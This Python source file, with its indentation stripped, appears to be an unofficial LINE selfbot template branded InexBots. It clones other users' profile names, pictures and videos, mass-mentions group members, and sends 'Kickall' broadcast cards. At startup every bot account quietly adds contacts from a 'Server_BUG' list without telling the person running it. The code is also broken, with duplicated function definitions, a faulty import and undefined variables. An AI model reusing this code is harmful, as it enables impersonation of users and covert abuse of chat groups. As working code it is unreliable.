myProfile["displayName"] = jakaProfile.displayName
myProfile["statusMessage"] = jakaProfile.statusMessage
myProfile["pictureStatus"] = jakaProfile.pictureStatus
imagesOpen = codecs.open("image.json","r","utf-8")
videosOpen = codecs.open("video.json","r","utf-8")
stickersOpen = codecs.open("sticker.json","r","utf-8")
audiosOpen = codecs.open("audio.json","r","utf-8")
plates = codecs.open("template.json","r","utf-8")
movieOp = codecs.open("movie.json","r","utf-8")
mengirim = json.load(movieOp)
plate = json.load(plates)
images = json.load(imagesOpen)
videos = json.load(videosOpen)
stickers = json.load(stickersOpen)
audios = json.load(audiosOpen)
Setbot = codecs.open("setting.json","r","utf-8")
Setmain = json.load(Setbot)
mulai = time.time()
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
cont = cl.getContact(mid)
Import_Server = plate["Server_BUG"]
for Allbots in ABC:
for LineX in Import_Server:
try:
Allbots.findAndAddContactsByMid(LineX)
except:pass
def restart_program():
python = sys.executable
os.execl(python, python, * sys.argv)
def logError(text):
cl.log("[ ERROR ] {}".format(str(text)))
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
timeHours = datetime.strftime(timeNow,"(%H:%M)")
day = ["Sunday", "Monday", "Tuesday", "Wednesday", "Thursday","Friday", "Saturday"]
hari = ["Minggu", "Senin", "Selasa", "Rabu", "Kamis", "Jumat", "Sabtu"]
bulan = ["Januari", "Februari", "Maret", "April", "Mei", "Juni", "Juli", "Agustus", "September", "Oktober", "November", "Desember"]
inihari = datetime.now(tz=tz)
hr = inihari.strftime('%A')
bln = inihari.strftime('%m')
for i in range(len(day)):
if hr == day[i]: hasil = hari[i]
for k in range(0, len(bulan)):
if bln == str(k): bln = bulan[k-1]
time = "{}, {} - {} - {} | {}".format(str(hasil), str(inihari.strftime('%d')), str(bln), str(inihari.strftime('%Y')), str(inihari.strftime('%H:%M:%S')))
with open("logError.txt","a") as error:
error.write("\n[ {} ] {}".format(str(time), text))
Devert = "My name is "+cont.displayName+" use your bot script Templates\n\nhttps://github.com/InexBots"
def delete_log():
ndt = datetime.now()
for data in msg_dict:
if (datetime.utcnow() - cTime_to_datetime(msg_dict[data]["createdTime"])) > timedelta(1):
if "path" in msg_dict[data]:
cl.deleteFile(msg_dict[data]["path"])
del msg_dict[data]
def download_page(url):
version = (3,0)
cur_version = sys.version_info
if cur_version >= version:
import urllib,request
try:
headers = {}
headers['User-Agent'] = "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
req = urllib,request.Request(url, headers = headers)
resp = urllib,request.urlopen(req)
respData = str(resp.read())
return respData
except Exception as e:
print(str(e))
else:
import urllib2
try:
headers = {}
headers['User-Agent'] = "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.27 Safari/537.17"
req = urllib2.Request(url, headers = headers)
response = urllib2.urlopen(req)
page = response.read()
return page
except:
return"Page Not found"
def delete_log():
ndt = datetime.now()
for data in msg_dict:
if (datetime.utcnow() - cTime_to_datetime(msg_dict[data]["createdTime"])) > datetime.timedelta(1):
del msg_dict[msg_id]
def _images_get_all_items(page):
items = []
while True:
item, end_content = _images_get_next_item(page)
if item == "no_links":
break
else:
items.append(item)
time.sleep(0.1)
page = page[end_content:]
return items
def downloadImageWithURL (mid):
contact = cl.getContact(mid)
if contact.videoProfile == None:
cl.cloneContactProfile(mid)
else:
profile = cl.getProfile()
profile.displayName, profile.statusMessage = contact.displayName, contact.statusMessage
client.updateProfile(profile)
pict = cl.downloadFileURL('http://dl.profile.line-cdn.net/' + contact.pictureStatus, saveAs="tmp/pict.bin")
vids = cl.downloadFileURL( 'http://dl.profile.line-cdn.net/' + contact.pictureStatus + '/vp', saveAs="tmp/video.bin")
changeVideoAndPictureProfile(pict, vids)
coverId = client.getProfileDetail(mid)['result']['objectId']
cl.updateProfileCoverById(coverId)
def restartBot():
python = sys.executable
os.execl(python, python, *sys.argv)
def waktu(secs):
mins, secs = divmod(secs,60)
hours, mins = divmod(mins,60)
days, hours = divmod(hours, 24)
return '%02d Hari %02d Jam %02d Menit %02d Detik' % (days, hours, mins, secs)
def runtime(secs):
mins, secs = divmod(secs,60)
hours, mins = divmod(mins,60)
days, hours = divmod(hours, 24)
return '%02d Hari %02d Jam %02d Menit %02d Detik' % (days, hours, mins, secs)
def sendImage(to, path, name="image"):
try:
if settings["server"] == "VPS":
client.sendImageWithURL(to, str(path))
except Exception as error:
logError(error)
def delExpire():
if temp_flood != {}:
for tmp in temp_flood:
if temp_flood[tmp]["expire"] == True:
if time.time() - temp_flood[tmp]["time"] >= 3*10:
temp_flood[tmp]["expire"] = False
temp_flood[tmp]["time"] = time.time()
try:
cl.sendMessage(tmp, "Bot kembali aktif")
except Exception as error:
logError(error)
def cTime_to_datetime(unixtime):
return datetime.fromtimestamp(int(str(unixtime)[:len(str(unixtime))-3]))
Extr = cl.getContact(Import_Server).displayName
def sendSticker(to, version, packageId, stickerId):
contentMetadata = {
'STKVER': version,
'STKPKGID': packageId,
'STKID': stickerId
}
cl.sendMessage(to, '', contentMetadata, 7)
def changeVideoAndPictureProfile(pict, vids):
try:
files = {'file': open(vids, 'rb')}
obs_params = cl.genOBSParams({'oid': mid, 'ver': '2.0', 'type': 'video', 'cat': 'vp.mp4'})
data = {'params': obs_params}
r_vp = cl.server.postContent('{}/talk/vp/upload.nhn'.format(str(cl.server.LINE_OBS_DOMAIN)), data=data, files=files)
if r_vp.status_code != 201:
return "Failed update profile"
cl.updateProfilePicture(pict, 'vp')
return "Success update profile"
except Exception as e:
raise Exception("Error change video and picture profile {}".format(str(e)))
def changeProfileVideo(to):
if settings['changeProfileVideo']['picture'] == None:
return cl.sendMessage(to, "Foto tidak ditemukan")
elif settings['changeProfileVideo']['video'] == None:
return cl.sendMessage(to, "Video tidak ditemukan")
else:
path = settings['changeProfileVideo']['video']
files = {'file': open(path, 'rb')}
obs_params = cl.genOBSParams({'oid': cl.getProfile().mid, 'ver': '2.0', 'type': 'video', 'cat': 'vp.mp4'})
data = {'params': obs_params}
r_vp = cl.server.postContent('{}/talk/vp/upload.nhn'.format(str(cl.server.LINE_OBS_DOMAIN)), data=data, files=files)
if r_vp.status_code != 201:
return cl.sendMessage(to, "Gagal update profile")
path_p = settings['changeProfileVideo']['picture']
settings['changeProfileVideo']['status'] = False
cl.updateProfilePicture(path_p, 'vp')
def cloneProfile(mid):
contact = cl.getContact(mid)
if contact.videoProfile == None:
cl.cloneContactProfile(mid)
else:
profile = cl.getProfile()
profile.displayName, profile.statusMessage = contact.displayName, contact.statusMessage
cl.updateProfile(profile)
pict = cl.downloadFileURL('http://dl.profile.line-cdn.net/' + contact.pictureStatus, saveAs="tmp/pict.bin")
vids = cl.downloadFileURL( 'http://dl.profile.line-cdn.net/' + contact.pictureStatus + '/vp', saveAs="tmp/video.bin")
changeVideoAndPictureProfile(pict, vids)
coverId = cl.getProfileDetail(mid)['result']['objectId']
cl.updateProfileCoverById(coverId)
def restoreProfile():
profile = cl.getProfile()
profile.displayName = settings['myProfile']['displayName']
profile.statusMessage = settings['myProfile']['statusMessage']
if settings['myProfile']['videoProfile'] == None:
profile.pictureStatus = settings['myProfile']['pictureStatus']
cl.updateProfileAttribute(8, profile.pictureStatus)
cl.updateProfile(profile)
else:
cl.updateProfile(profile)
pict = cl.downloadFileURL('http://dl.profile.line-cdn.net/' + settings['myProfile']['pictureStatus'], saveAs="tmp/pict.bin")
vids = cl.downloadFileURL( 'http://dl.profile.line-cdn.net/' + settings['myProfile']['pictureStatus'] + '/vp', saveAs="tmp/video.bin")
changeVideoAndPictureProfile(pict, vids)
coverId = settings['myProfile']['coverId']
cl.updateProfileCoverById(coverId)
def speedtest(secs):
mins, secs = divmod(secs,60)
hours, mins = divmod(mins,60)
days, hours = divmod(hours,24)
weaks, days = divmod(days,7)
if days == 0:
return '%02d' % (secs)
elif days > 0 and weaks == 0:
return '%02d' %(secs)
elif days > 0 and weaks > 0:
return '%02d' %(secs)
def backupProfile():
profile = cl.getContact(mid)
settings['myProfile']['displayName'] = profile.displayName
settings['myProfile']['pictureStatus'] = profile.pictureStatus
settings['myProfile']['statusMessage'] = profile.statusMessage
settings['myProfile']['videoProfile'] = profile.videoProfile
coverId = cl.getProfileDetail()['result']['objectId']
settings['myProfile']['coverId'] = str(coverId)
def delete_log():
ndt = datetime.now()
for data in msg_dict:
if (datetime.utcnow() - cTime_to_datetime(msg_dict[data]["createdTime"])) > timedelta(1):
if "path" in msg_dict[data]:
cl.deleteFile(msg_dict[data]["path"])
del msg_dict[data]
extras = Extr+"\n"
def delete_log1():
ndt = datetime.now()
for data in msg_dict1:
if (datetime.utcnow() - cTime_to_datetime(msg_dict1[data]["createdTime"])) > timedelta(1):
if "path" in msg_dict1[data]:
cl.deleteFile(msg_dict[data]["path"])
del msg_dict1[data]
def cTime_to_datetime(unixtime):
return datetime.fromtimestamp(int(str(unixtime)[:len(str(unixtime))-3]))
def dt_to_str(dt):
return dt.strftime('%H:%M:%S')
def delete_log():
ndt = datetime.now()
for data in msg_dict:
if (datetime.utcnow() - cTime_to_datetime(msg_dict[data]["createdTime"])) > datetime.timedelta(1):
del msg_dict[msg_id]
def downloadImageWithURL (mid):
contact = cl.getContact(mid)
if contact.videoProfile == None:
cl.cloneContactProfile(mid)
else:
profile = cl.getProfile()
profile.displayName, profile.statusMessage = contact.displayName, contact.statusMessage
client.updateProfile(profile)
pict = cl.downloadFileURL('http://dl.profile.line-cdn.net/' + contact.pictureStatus, saveAs="tmp/pict.bin")
vids = cl.downloadFileURL( 'http://dl.profile.line-cdn.net/' + contact.pictureStatus + '/vp', saveAs="tmp/video.bin")
changeVideoAndPictureProfile(pict, vids)
coverId = client.getProfileDetail(mid)['result']['objectId']
cl.updateProfileCoverById(coverId)
def sendMeention(to, text="", mids=[]):
arrData = ""
arr = []
mention = "@InexBots \n"
if mids == []:
raise Exception("Invalid mids")
if "@!" in text:
if text.count("@!") != len(mids):
raise Exception("Invalid mids")
texts = text.split("@!")
textx = ""
for mid in mids:
textx += str(texts[mids.index(mid)])
slen = len(textx)
elen = len(textx) + 15
arrData = {'S':str(slen), 'E':str(elen - 4), 'M':mid}
arr.append(arrData)
textx += mention
textx += str(texts[len(mids)])
else:
textx = ""
slen = len(textx)
elen = len(textx) + 15
arrData = {'S':str(slen), 'E':str(elen - 4), 'M':mids[0]}
arr.append(arrData)
textx += mention + str(text)
cl.sendMessage(to, textx, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
def sendMention1(to, mid, firstmessage, lastmessage):
try:
arrData = ""
text = "%s " %(str(firstmessage))
arr = []
mention = "@InexBots "
slen = str(len(text))
elen = str(len(text) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':mid}
arr.append(arrData)
text += mention + str(lastmessage)
cl.sendMessage(to, text, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
cl.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def mentionMembers(to, mid):
try:
arrData = ""
textx = "Total Mention User「{}」\n\n [ Mention ]\n1. ".format(str(len(mid)))
arr = []
no = 1
num = 2
for i in mid:
mention = "@InexBots\n"
slen = str(len(textx))
elen = str(len(textx) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':i}
arr.append(arrData)
textx += mention
if no < len(mid):
no += 1
textx += "%i. " % (num)
num=(num+1)
else:
try:
no = "\n╚☠•➤[ {} ]".format(str(cl.getGroup(to).name))
except:
no = "\n╚☠•➤[ Success ]"
cl.sendMessage(to, textx, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
cl.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def siderMembers(to, mid):
try:
arrData = ""
textx = "☠•➤Total User☠•➤「{}」\n☠•➤Haii ".format(str(len(mid)))
arr = []
no = 1
num = 2
for i in mid:
mention = "@InexBots\n"
slen = str(len(textx))
elen = str(len(textx) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':i}
arr.append(arrData)
textx += mention+wait["mention"]
if no < len(mid):
no += 1
textx += "%i. " % (num)
num=(num+1)
else:
try:
no = "\n╚☠•➤[ {} ]".format(str(cl.getGroup(to).name))
except:
no = "\n╚☠•➤[ Success ]"
cl.sendMessage(to, textx, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
image = 'http://dl.profile.line.naver.jp'+contact
cl.sendImageWithURL(op.param2, image)
cl.sendMessage(to, None, contentMetadata={"STKID":"51626528","STKPKGID":"11538","STKVER":"1"}, contentType=7)
except Exception as error:
cl.sendMessage(to, None, contentMetadata={"STKID":"51626528","STKPKGID":"11538","STKVER":"1"}, contentType=7)
def welcomeMembers(to, mid):
try:
arrData = ""
textx = "山乇ㄥ匚ㄖ爪乇 "
arr = []
no = 1
num = 2
for i in mid:
ginfo = cl.getGroup(to)
mention = "@InexBots\n"
slen = str(len(textx))
elen = str(len(textx) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':i}
arr.append(arrData)
textx += mention+wait["welcome"]+"\nNama grup : "+str(ginfo.name)
if no < len(mid):
no += 1
textx += "%i " % (num)
num=(num+1)
else:
try:
no = "\n╚☠•➤[ {} ]".format(str(cl.getGroup(to).name))
except:
no = "\n╚☠•➤[ Success ]"
#cl.sendMessage(to, textx, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
data = {
"type": "flex",
"altText": "JANGAN KABUR DARI GRUP KAK",
"contents": {
"type": "bubble",
"styles": {
"header": {
"backgroundColor": "#000080",
},
"body": {
"backgroundColor": "#0000FF",
"separator": True,
"separatorColor": "#ffffff"
},
"footer": {
"backgroundColor": "#000080",
"separator": True
}
},
"header": {
"type": "box",
"layout": "horizontal",
"contents": [
{
"type": "text",
"text": "山乇ㄥ匚ㄖ爪乇 爪乇爪乃乇尺",
"weight": "bold",
"color": "#FF0000",
"size": "xxl"
}
]
},
"hero": {
"type": "image",
"url": "https://thumbs.gfycat.com/DearestPoshAfricanclawedfrog.webp",
"size": "full",
"aspectRatio": "20:13",
"aspectMode": "cover",
"action": {
"type": "uri",
"uri": "https://line.me/ti/p/~denjaka-inexx"
}
},
"type": "bubble",
"body": {
"type": "box",
"layout": "horizontal",
"contents": [
{
"type": "text",
"text": str(textx),
"wrap": True,
"color": "#00FF00",
"align": "center"
}
]
},
"footer": {
"type": "box",
"layout": "vertical",
"spacing": "sm",
"contents": [{
"type": "button",
"style": "primary",
"color": "#00FF00",
"height": "sm",
"action": {
"type": "uri",
"label": "ADD MY LINE",
"uri": "https://line.me/ti/p/"+cl.getUserTicket().id
}
},
{
"type": "spacer",
"size": "sm",
}],
"flex": 0
}
}
}
cl.sendFlex(to, data)
except Exception as error:
cl.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def leaveMembers(to, mid):
try:
arrData = ""
textx = " ".format(str(len(mid)))
arr = []
no = 1
num = 2
for i in mid:
ginfo = cl.getGroup(to)
mention = "@InexBots\n"
slen = str(len(textx))
elen = str(len(textx) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':i}
arr.append(arrData)
textx += "bye bye"
if no < len(mid):
no += 1
textx += "%i " % (num)
num=(num+1)
else:
try:
no = "\n╚☠•➤[ {} ]".format(str(cl.getGroup(to).name))
except:
no = "\n╚☠•➤[ Success ]"
except Exception as error:
cl.sendMessage(to)
#TAGALL LUAR ROOM BAHAN
def mentionMembers(to, mid):
try:
arrData = ""
textx = "╭━━━━━━━━━━━━━━━━━━━━╮\n├ ☠ MENTION [ {} ] MEMBER\n├━━━━━━━━━━━━━━━━━━━━\n├[1.]☠".format(str(len(mid)))
arr = []
no = 1
num = 2
for i in mid:
mention = "@InexBots\n"
slen = str(len(textx))
elen = str(len(textx) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':i}
arr.append(arrData)
textx += mention
if no < len(mid):
no += 1
textx += "├[%i.]☠ " % (num)
num=(num+1)
else:
try:
no = "\n╚☠•➤[ {} ]".format(str(line.getGroup(to).name))
except:
no = "\n╚☠•➤[ Success ]"
cl.sendMessage(to, textx+"╰━━━━━━━━━━━━━━━━━━━━╯", {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
logError(error)
def sendMentionV3(to, text="", mids=[]):
arrData = ""
arr = []
mention = "@InexBots "
if mids == []:
raise Exception("Invalid mids")
if "@!" in text:
if text.count("@!") != len(mids):
raise Exception("Invalid mids")
texts = text.split("@!")
textx = ""
for mid in mids:
textx += str(texts[mids.index(mid)])
slen = len(textx)
elen = len(textx) + 15
arrData = {'S':str(slen), 'E':str(elen - 4), 'M':mid}
arr.append(arrData)
textx += mention
textx += str(texts[len(mids)])
else:
textx = ""
slen = len(textx)
elen = len(textx) + 15
arrData = {'S':str(slen), 'E':str(elen - 4), 'M':mids[0]}
arr.append(arrData)
textx += mention + str(text)
cl.sendMessage(to, textx, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
def sendMentionV2(to, text="", mids=[]):
arrData = ""
arr = []
mention = "@InexBots "
if mids == []:
raise Exception("Invalid mids")
if "@!" in text:
if text.count("@!") != len(mids):
raise Exception("Invalid mids")
texts = text.split("@!")
textx = ""
for mid in mids:
textx += str(texts[mids.index(mid)])
slen = len(textx)
elen = len(textx) + 15
arrData = {'S':str(slen), 'E':str(elen - 4), 'M':mid}
arr.append(arrData)
textx += mention
textx += str(texts[len(mids)])
else:
textx = ""
slen = len(textx)
elen = len(textx) + 15
arrData = {'S':str(slen), 'E':str(elen - 4), 'M':mids[0]}
arr.append(arrData)
textx += mention + str(text)
cl.sendMessage(to, textx, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
def sendMention(to, mid, firstmessage):
try:
arrData = ""
text = "%s " %(str(firstmessage))
arr = []
mention = "@InexBots \n"
slen = str(len(text))
elen = str(len(text) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':mid}
arr.append(arrData)
today = datetime.today()
future = datetime(2018,3,1)
hari = (str(future - today))
comma = hari.find(",")
hari = hari[:comma]
teman = cl.getAllContactIds()
gid = cl.getGroupIdsJoined()
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
eltime = time.time() - mulai
bot = runtime(eltime)
text += mention+"◐ Jam : "+datetime.strftime(timeNow,'%H:%M:%S')+" Wib\n⏩ Group : "+str(len(gid))+"\n⏩ Teman : "+str(len(teman))+"\n⏩ Expired : In "+hari+"\n⏩ Version : ANTIJS2\n⏩ Tanggal : "+datetime.strftime(timeNow,'%Y-%m-%d')+"\n⏩ Runtime : \n • "+bot
cl.sendMessage(to, text, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
cl.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def sendStickerTemplate(to, text):
url = "https://game.linefriends.com/jbp-lcs-ranking/lcs/sendMessage"
to = op.param1
data = {
"type": "template",
"altText": "{} sent a sticker".format(client.getProfile().displayName),
"template": {
"type": "image_carousel",
"columns": [
{
"imageUrl": text,
"size": "full",
"action": {
"type": "uri",
"uri": "http://line.me/ti/p/~mdfs99"
}
}
]
}
}
cl.sendFlex(to, data)
def sendBcast(to, text):
warna1 = ("#1AE501","#0108E5","#E50AE0","#E50F00","#DEE500","#47E1E5","#C82EF8")
warnanya1 = random.choice(warna1)
data = {
"type": "flex",
"altText": "Kickall ", #.format(dzProfile.displayName),
"contents": {
"type": "bubble",
"styles": {
"header": {
"backgroundColor": "#0000FF",
},
"body": {
"backgroundColor": "#000000",
"separator": True,
"separatorColor": "#ffffff"
},
"footer": {
"backgroundColor": "#000080",
"separator": True
}
},
"header": {
"type": "box",
"layout": "horizontal",
"contents": [
{
"type": "text",
"text": "乃尺ㄖ卂ᗪ匚卂丂ㄒ",
"weight": "bold",
"color": warnanya1,
"size": "md"
}
]
},
"hero": {
"type": "image",
"url": "https://media.giphy.com/media/67pVlH3LSLDjTBikzf/giphy.gif",
"size": "full",
"aspectRatio": "20:13",
"aspectMode": "cover",
"action": {
"type": "uri",
"uri": "https://line.me/ti/p/~denjaka-inexx"
}
},
"type": "bubble",
"body": {
"type": "box",
"layout": "horizontal",
"contents": [
{
"type": "text",
"text": text,
"wrap": True,
"color": warnanya1,
"align": "center"
}
]
},
"footer": {
"type": "box",
"layout": "vertical",
"spacing": "sm",
"contents": [{
"type": "button",
"style": "primary",
"color": warnanya1,
"height": "sm",
"action": {
"type": "uri",
"label": "ADD MY LINE",
"uri": "https://line.me/ti/p/"+cl.getUserTicket().id
}
},
{
"type": "spacer",
"size": "sm",
}],
"flex": 0
}
}
}
cl.sendFlex(group, data)
def sendTextTemplate13(to, text):
warna1 = ("#1AE501","#0108E5","#E50AE0","#E50F00","#DEE500","#47E1E5","#C82EF8")
warnanya1 = random.choice(warna1)
data = {
"type": "flex",
"altText": "InexBots",
"contents": {
"styles": {
"body": {
"backgroundColor": "#000000"
},
"footer": {
"backgroundColor": "#000000"
}
},
"type": "bubble",
"body": {
"contents": [
{
"contents": [
{
"text": " INDONESIA EXTHREME",
"size": "xs",
"color": "#00FF33",
"wrap": True,
"weight": "bold",
"type": "text"
},
{
"type": "separator",
"color": "#000000"
}
],
"type": "box",
"spacing": "md",
"layout": "horizontal"
},
{
"contents": [
{
"contents": [
{
"text": text,
"size": "sm",
"margin": "none",
"color": "#FFFF00",
"wrap": True,
"weight": "regular",
"type": "text"
}
],
"type": "box",
"layout": "baseline"
}
],
"type": "box",
"layout": "vertical"
}
],
"type": "box",
"spacing": "md",
"layout": "vertical"
},
"footer": {
"type": "box",
"layout": "vertical",
"contents": [{
"type": "box",
"layout": "horizontal",
"contents": [{
"type": "button",
"flex": 2,
"style": "primary",
"color": "#006400",
"height": "sm",
"action": {
"type": "uri",
"label": "OFFICIAL",
"uri": "https://line.me/R/ti/p/%40bvb1195k"
}
}, {
"flex": 3,
"type": "button",
"style": "primary",
"color": "#800000",
"margin": "sm",
"height": "sm",
"action": {
"type": "uri",
"label": "CREATOR",
"uri": "http://line.me/ti/p/~denjaka-inexx"
}
}]
}]
}
}
}
cl.sendFlex(to, data)
def sendBradcast(to, text):
warna1 = ("#1AE501","#0108E5","#E50AE0","#E50F00","#DEE500","#47E1E5","#C82EF8")
warnanya1 = random.choice(warna1)
data = {
"type": "flex",
"altText": "Kickall ", #.format(dzProfile.displayName),
"contents": {
"type": "bubble",
"styles": {
"header": {
"backgroundColor": "#0000FF",
},
"body": {
"backgroundColor": "#000000",
"separator": True,
"separatorColor": "#ffffff"
},
"footer": {
"backgroundColor": "#000080",
"separator": True
}
},
"header": {
"type": "box",
"layout": "horizontal",
"contents": [
{
"type": "text",
"text": "乃尺ㄖ卂ᗪ匚卂丂ㄒ",
"weight": "bold",
"color": warnanya1,
"size": "md"
}
]
},
"hero": {
"type": "image",
"url": "https://media.giphy.com/media/67pVlH3LSLDjTBikzf/giphy.gif",
"size": "full",
"aspectRatio": "20:13",
"aspectMode": "cover",
"action": {
"type": "uri",
"uri": "https://line.me/ti/p/~denjaka-inexx"
}
},
"type": "bubble",
"body": {
"type": "box",
"layout": "horizontal",
"contents": [
{
"type": "text",
"text": text,
"wrap": True,
"color": warnanya1,
"align": "center"
}
]
},
"footer": {
"type": "box",
"layout": "vertical",
"spacing": "sm",
"contents": [{
"type": "button",
"style": "primary",
"color": warnanya1,
"height": "sm",
"action": {
"type": "uri",
"label": "ADD MY LINE",
"uri": "https://line.me/ti/p/"+cl.getUserTicket().id
}
},
{
"type": "spacer",
"size": "sm",
}],
"flex": 0
}
}
}
cl.sendFlex(group, data)
def sendTextTemplate7(to, text):
warna1 = ("#1AE501","#0108E5","#E50AE0","#E50F00","#DEE500","#47E1E5","#C82EF8")
warnanya1 = random.choice(warna1)
data = {
"type": "flex",
"altText": "{} menghapus anda dari grup".format(cl.getProfile().displayName),
"contents": {
"type": "bubble",
"body": {
"type": "box",
"layout": "horizontal",
"spacing": "md",
"contents": [
{
"type": "box",
"layout": "vertical",
"flex": 2,
"contents": [
{
"type": "text",
"text": text,
"size": "md",
"weight": "bold",
"wrap": True,
"color": "#40E0D0",
"align": "center"
},
]
}
]
},
"styles": {
"body": {
"backgroundColor": "#000000"
},
"footer": {
"backgroundColor": "#00008B"
},
"header": {
"backgroundColor": "#00008B"
}
},
"hero": {
"type": "image",
"aspectRatio": "20:13",
"aspectMode": "cover",
"url": "https://obs.line-scdn.net/{}".format(cl.getContact(op.param2).pictureStatus),
"size": "full",
"margin": "xl"
},
"footer": {
"type": "box",
"layout": "horizontal",
"contents": [
{
"type": "text",
"text": "CREATOR",
"size": "xl",
"wrap": True,
"weight": "bold",
"color": "#7CFC00",
"action": {
"type": "uri",
"uri": "http://line.me/ti/p/~denjaka-inexx"
},
"align": "center"
},
{
"type": "separator",
"color": "#E5E4E2"
},
{
"type": "text",
"text": "ORDER",
"size": "xl",
"wrap": True,
"weight": "bold",
"color": "#FFD700",
"action": {
"type": "uri",
"uri": "line://app/1602687308-GXq4Vvk9/?type=text&text=price"
},
"align": "center"
}
]
},
"header": {
"type": "box",
"layout": "horizontal",
"contents": [
{
"type": "text",
"text": "INEXBOT",
"size": "xl",
"wrap": True,
"weight": "bold",
"color": "#F0F8FF",
"align": "center"
}
]
}
}
}
cl.sendFlex(to, data)
def sendTextTemplate44(to, text):
warna1 = ("#1AE501","#0108E5","#E50AE0","#E50F00","#DEE500","#47E1E5","#C82EF8")
warnanya1 = random.choice(warna1)
data = {
"type": "flex",
"altText": "{} Mencintaimu ".format(cl.getProfile().displayName),
"contents": {
"type": "bubble",
"styles": {
"header": {
"backgroundColor": "#0000FF",
},
"body": {
"backgroundColor": "#000000",
"separator": True,
"separatorColor": "#ffffff"
},
"footer": {
"backgroundColor": "#000080",
"separator": True
}
},
"header": {
"type": "box",
"layout": "horizontal",
"contents": [
{
"type": "text",
"text": "Nama : {}".format(cl.getContact(op.param2).displayName),
"weight": "bold",
"color": warnanya1,
"size": "md"
}
]
},
"hero": {
"type": "image",
"url": "https://obs.line-scdn.net/{}".format(cl.getContact(op.param2).pictureStatus),
"size": "full",
"aspectRatio": "20:13",
"aspectMode": "cover",
"action": {
"type": "uri",
"uri": "https://line.me/ti/p/~denjaka-inexx"
}
},
"type": "bubble",
"body": {
"type": "box",
"layout": "horizontal",
"contents": [
{
"type": "text",
"text": "{}".format(cl.getContact(op.param2).displayName)+str(text),
"wrap": True,
"color": warnanya1,
"align": "center"
}
]
},
"footer": {
"type": "box",
"layout": "vertical",
"spacing": "sm",
"contents": [{
"type": "button",
"style": "primary",
"color": warnanya1,
"height": "sm",
"action": {
"type": "uri",
"label": "ADD MY LINE",
"uri": "https://line.me/ti/p/"+cl.getUserTicket().id
}
},
{
"type": "spacer",
"size": "sm",
}],
"flex": 0
}
}
}
cl.sendFlex(to, data)
def sendTextTemplate1(to, text):
warna1 = ("#1AE501","#0108E5","#E50AE0","#E50F00","#DEE500","#47E1E5","#C82EF8")
warnanya1 = random.choice(warna1)
data = {
"type": "template",
"altText": "InexBots",
"contents": {
"type": "bubble",
"body": {
"type": "box",
"layout": "vertical",
"contents": [
{
"text": text,
"size": "sm",
"margin": "none",
"color": "#8B008B",
"wrap": True,
"weight": "regular",
"type": "text"
}
]
}
}
}
cl.sendFlex(to, data)
def sendTextTemplate3(to, text):
warna1 = ("#1AE501","#0108E5","#E50AE0","#E50F00","#DEE500","#47E1E5","#C82EF8")
warnanya1 = random.choice(warna1)
data = {
"type": "flex",
"altText": "HELP XTC INEX",
"contents": {
"type": "bubble",
"body": {
"type": "box",
"layout": "horizontal",
"spacing": "md",
"contents": [
{
"type": "box",
"layout": "vertical",
"flex": 2,
"contents": [
{
"type": "text",
"text": text,
"size": "sm",
"weight": "bold",
"wrap": True,
"color": "#40ff00"
}
]
}
]
},
"styles": {
"body": {
"backgroundColor": "#000000"
},
"footer": {
"backgroundColor": "#03f5f1"
},
"header": {
"backgroundColor": "#03f5f1"
}
},
"hero": {
"type": "image",
"aspectRatio": "20:13",
"aspectMode": "cover",
"url": "https://media.giphy.com/media/67pVlH3LSLDjTBikzf/giphy.gif",
"size": "full",
"margin": "xl"
},
"footer": {
"type": "box",
"layout": "vertical",
"contents": [{
"type": "box",
"layout": "horizontal",
"contents": [{
"type": "button",
"flex": 2,
"style": "primary",
"color": "#ff0a3b",
"height": "sm",
"action": {
"type": "uri",
"label": "OFFICIAL",
"uri": "https://line.me/R/ti/p/%40bvb1195k"
}
}, {
"flex": 3,
"type": "button",
"style": "primary",
"color": "#310dff",
"margin": "sm",
"height": "sm",
"action": {
"type": "uri",
"label": "CREATOR",
"uri": "http://line.me/ti/p/~denjaka-inexx"
}
}]
}]
}
}
}
cl.sendFlex(to, data)
def sendStickerTemplate(to, text):
url = "https://game.linefriends.com/jbp-lcs-ranking/lcs/sendMessage"
to = op.param1
data = {
"type": "template",
"altText": "{} sent a sticker".format(cl.getProfile().displayName),
"template": {
"type": "image_carousel",
"columns": [
{
"imageUrl": text,
"size": "full",
"action": {
"type": "uri",
"uri": "http://line.me/ti/p/~denjaka-inexx"
}
}
]
}
}
cl.sendFlex(to, data)
def sendTextTemplate4(to, text):
data = {
"type": "flex",
"altText": "{} lagi kojom dulu".format(cl.getProfile().displayName),
"contents": {
"type": "bubble",
"body": {
"type": "box",
"layout": "horizontal",
"spacing": "md",
"contents": [
{
"type": "box",
"layout": "vertical",
"flex": 2,
"contents": [
{
"type": "text",
"text": text,
"size": "md",
"weight": "bold",
"wrap": True,
"color": "#40E0D0",
"align": "center"
},
]
}
]
},
